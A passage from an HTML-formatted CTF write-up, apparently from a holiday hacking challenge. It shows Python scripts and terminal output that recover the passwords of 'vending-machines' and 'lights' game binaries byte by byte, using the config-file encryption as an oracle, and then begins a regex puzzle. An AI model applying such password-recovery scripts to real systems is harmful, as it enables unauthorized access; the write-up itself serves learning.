            &lt;span class="n"&gt;candidate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;
            &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;system&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;echo &amp;quot;elf-maintenance&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;{}&amp;quot; | ./vending-machines &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;candidate&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;vending-machines.json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;vm_conf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;enc_candidate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;vm_conf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;password&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;enc_candidate&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
                &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Found a match! Character #{} is {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;FOUND NO MATCH FOR INDEX {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Plain text password:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;plain_password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's run it. After approximately 10 minutes:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~/lab $&lt;/span&gt; ./crack_vending_machines.py
&lt;span class="go"&gt;Found a match! Character #0 is C&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #1 is a&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #2 is n&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #3 is d&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #4 is y&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #5 is C&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #6 is a&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #7 is n&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #8 is e&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #9 is 1&lt;/span&gt;
&lt;span class="go"&gt;Plain text password: CandyCane1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We got a match! And it seems to make sense. Let's try &lt;code&gt;CandyCane1&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@fd6550200a09 ~ $&lt;/span&gt; ./vending-machines
&lt;span class="go"&gt;The elves are hungry!&lt;/span&gt;

&lt;span class="go"&gt;If the door&amp;#39;s still closed or the lights are still off, you know because&lt;/span&gt;
&lt;span class="go"&gt;you can hear them complaining about the turned-off vending machines!&lt;/span&gt;
&lt;span class="go"&gt;You can probably make some friends if you can get them back on...&lt;/span&gt;

&lt;span class="go"&gt;Loading configuration from: /home/elf/vending-machines.json&lt;/span&gt;

&lt;span class="go"&gt;I wonder what would happen if it couldn&amp;#39;t find its config file? Maybe that&amp;#39;s&lt;/span&gt;
&lt;span class="go"&gt;something you could figure out in the lab...&lt;/span&gt;

&lt;span class="go"&gt;Welcome, elf-maintenance! It looks like you want to turn the vending machines back on?&lt;/span&gt;
&lt;span class="go"&gt;Please enter the vending-machine-back-on code &amp;gt; CandyCane1&lt;/span&gt;
&lt;span class="go"&gt;Checking......&lt;/span&gt;

&lt;span class="go"&gt;Vending machines enabled!!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Yay, now we can eat snacks!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="turning-the-lights-on"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id19"&gt;Turning the lights on&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The &lt;code&gt;lights&lt;/code&gt; executable also reads a configuration file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~ $&lt;/span&gt; ./lights
&lt;span class="go"&gt;The speaker unpreparedness room sure is dark, you&amp;#39;re thinking (assuming&lt;/span&gt;
&lt;span class="go"&gt;you&amp;#39;ve opened the door; otherwise, you wonder how dark it actually is)&lt;/span&gt;

&lt;span class="go"&gt;You wonder how to turn the lights on? If only you had some kind of hin---&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt; &amp;gt;&amp;gt;&amp;gt; CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;---t to help figure out the password... I guess you&amp;#39;ll just have to make do!&lt;/span&gt;

&lt;span class="go"&gt;The terminal just blinks: Welcome back, elf-technician&lt;/span&gt;

&lt;span class="go"&gt;What do you enter? &amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~ $&lt;/span&gt; cat ./lights.conf
&lt;span class="go"&gt;password: E$ed633d885dcb9b2f3f0118361de4d57752712c27c5316a95d9e5e5b124&lt;/span&gt;
&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As for the vending machines, let's go in the &lt;code&gt;lab&lt;/code&gt; folder to tinker with
this configuration file. First, let's try to remove it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; rm ./lights.conf
&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; ./lights

&lt;span class="go"&gt;ERROR: Could not load /home/elf/lab/lights.conf&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The program simply refuses to launch. Let's restore the configuration file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cp ../lights.conf ./lights.conf
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let's try to modify the &lt;code&gt;password&lt;/code&gt; field. With some testing, we can
kind of figure out that the &lt;code&gt;E$&lt;/code&gt; indicates that the password is an
encrypted field. Let's try to modify the value that comes after that:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cat lights.conf
&lt;span class="hll"&gt;&lt;span class="go"&gt;password: E$e&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; ./lights
&lt;span class="go"&gt;Failed to parse key `password`: OddLength&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Password is missing from config file!&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The parsing failed, because we only left an &lt;code&gt;e&lt;/code&gt;. The password field is
probably hex-encoded, and therefore the parsing fails if there's an odd number
of characters. So let's keep the length even:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cat ./lights.conf
&lt;span class="hll"&gt;&lt;span class="go"&gt;password: E$ed&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; ./lights
&lt;span class="hll"&gt;&lt;span class="go"&gt;Password is missing from config file!&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, that's weird, the &lt;code&gt;lights&lt;/code&gt; program seems to consider that there is
no password in the configuration file. Let's keep adding bytes to the
&lt;code&gt;password&lt;/code&gt; field. We get the same error message, until:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cat lights.conf
&lt;span class="hll"&gt;&lt;span class="go"&gt;password: E$ed633d885dcb9b2f&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; ./lights
&lt;span class="go"&gt;The speaker unpreparedness room sure is dark, you&amp;#39;re thinking (assuming&lt;/span&gt;
&lt;span class="go"&gt;you&amp;#39;ve opened the door; otherwise, you wonder how dark it actually is)&lt;/span&gt;

&lt;span class="go"&gt;You wonder how to turn the lights on? If only you had some kind of hin---&lt;/span&gt;

&lt;span class="go"&gt; &amp;gt;&amp;gt;&amp;gt; CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lab/lights.conf&lt;/span&gt;

&lt;span class="go"&gt;---t to help figure out the password... I guess you&amp;#39;ll just have to make do!&lt;/span&gt;

&lt;span class="go"&gt;The terminal just blinks: Welcome back, elf-technician&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;What do you enter? &amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Checking......&lt;/span&gt;
&lt;span class="go"&gt;That would have turned on the lights!&lt;/span&gt;

&lt;span class="go"&gt;If you&amp;#39;ve figured out the real password, be sure you run /home/elf/lights&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With a value of &lt;code&gt;E$ed633d885dcb9b2f&lt;/code&gt;, the program accepts an empty
password. So maybe, the beginning of the field is some kind of encryption key,
and the rest is the encrypted password.&lt;/p&gt;
&lt;p&gt;Let's add one more byte to the password field:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cat lights.conf
&lt;span class="go"&gt;password: E$ed633d885dcb9b2f3f&lt;/span&gt;
&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We keep trying one-character long password until:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;What do you enter? &amp;gt; C&lt;/span&gt;
&lt;span class="go"&gt;Checking......&lt;/span&gt;
&lt;span class="go"&gt;That would have turned on the lights!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ha! The first character seems to be a &lt;code&gt;C&lt;/code&gt;. Let's add another byte and
see if we can find the second character:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~/lab $&lt;/span&gt; cat lights.conf
&lt;span class="go"&gt;password: E$ed633d885dcb9b2f3f01&lt;/span&gt;
&lt;span class="go"&gt;name: elf-technician&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After a while:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;What do you enter? &amp;gt; Co&lt;/span&gt;
&lt;span class="go"&gt;Checking......&lt;/span&gt;
&lt;span class="go"&gt;That would have turned on the lights!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the password begins with &lt;code&gt;Co&lt;/code&gt;. Just like with the vending machines,
we seem to be able to decrypt the password byte by byte. Let's adapt our
previous script for cracking the lights' password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;string&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;subprocess&lt;/span&gt;

&lt;span class="n"&gt;CONFIG_FILE_TEMPLATE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&amp;#39;password: E$ed633d885dcb9b2f{}&lt;/span&gt;
&lt;span class="s1"&gt;name: elf-technician&lt;/span&gt;
&lt;span class="s1"&gt;&amp;#39;&amp;#39;&amp;#39;&lt;/span&gt;
&lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;3f0118361de4d57752712c27c5316a95d9e5e5b124&amp;#39;&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;charset&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;printable&lt;/span&gt;
    &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CONFIG_FILE_TEMPLATE&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ENC_PASSWORD&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)])&lt;/span&gt;
        &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./lights.conf&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;w&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;charset&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;candidate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;
            &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;run&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./lights&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PIPE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;input&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;candidate&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Beep boop invalid password&amp;#39;&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Found a match! Character #{} is {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="n"&gt;plain_password&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;FOUND NO MATCH FOR INDEX {}&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Plain text password: &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;plain_password&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's run it. This script takes a bit more time than the previous one, since
the password is twice as long:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~ $&lt;/span&gt; ./crack_lights.py
&lt;span class="go"&gt;Found a match! Character #0 is C&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #1 is o&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #2 is m&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #3 is p&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #4 is u&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #5 is t&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #6 is e&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #7 is r&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #8 is -&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #9 is T&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #10 is u&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #11 is r&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #12 is n&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #13 is L&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #14 is i&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #15 is g&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #16 is h&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #17 is t&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #18 is s&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #19 is O&lt;/span&gt;
&lt;span class="go"&gt;Found a match! Character #20 is n&lt;/span&gt;
&lt;span class="go"&gt;Plain text password:  Computer-TurnLightsOn&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We seem to have gotten a good password, let's try it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@7e9797985297 ~ $&lt;/span&gt; ./lights
&lt;span class="go"&gt;The speaker unpreparedness room sure is dark, you&amp;#39;re thinking (assuming&lt;/span&gt;
&lt;span class="go"&gt;you&amp;#39;ve opened the door; otherwise, you wonder how dark it actually is)&lt;/span&gt;

&lt;span class="go"&gt;You wonder how to turn the lights on? If only you had some kind of hin---&lt;/span&gt;

&lt;span class="go"&gt; &amp;gt;&amp;gt;&amp;gt; CONFIGURATION FILE LOADED, SELECT FIELDS DECRYPTED: /home/elf/lights.conf&lt;/span&gt;

&lt;span class="go"&gt;---t to help figure out the password... I guess you&amp;#39;ll just have to make do!&lt;/span&gt;

&lt;span class="go"&gt;The terminal just blinks: Welcome back, elf-technician&lt;/span&gt;

&lt;span class="go"&gt;What do you enter? &amp;gt; Computer-TurnLightsOn&lt;/span&gt;
&lt;span class="go"&gt;Checking......&lt;/span&gt;

&lt;span class="go"&gt;Lights on!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let there be light!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="misty-candycane-regex-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id20"&gt;Misty Candycane regex Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Before we try to open the HID lock, let's give a hand to Misty Candycane and
her Sort-o-Matic.&lt;/p&gt;
&lt;p&gt;We're supposed to find regular expressions that match the desired values. I
will detail the construction of non trivial regex. &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Regular_expression"&gt;Regular expressions&lt;/a&gt; are an extremely useful
tool, and I use them almost daily at my job. I highly encourage you to learn
how to use them, they can be very powerful.&lt;/p&gt;
&lt;p&gt;Here we go:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Matches at least one digit&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;\d+&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;Matches 3 alpha a-z characters ignoring case&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;[a-zA-Z]{3}&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;Matches 2 chars of lowercase a-z or numbers&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;[a-z0-9]{2}&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;Matches any 2 chars not uppercase A-L or 1-5&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Here, we use the syntax &lt;code&gt;[^...]&lt;/code&gt; to exclude characters from a character
set: &lt;code&gt;[^A-L1-5]{2}&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Matches three or more digits only&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;code&gt;^[0-9]{3,}$&lt;/code&gt;&lt;/p&gt;
&lt;ol class="arabic" start="6"&gt;
&lt;li&gt;&lt;p class="first"&gt;Matches multiple hour:minute:second time formats only&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Create a regular expression that only matches if the entire string is a
valid Hour, Minute and Seconds time format similar to the following:&lt;/p&gt;
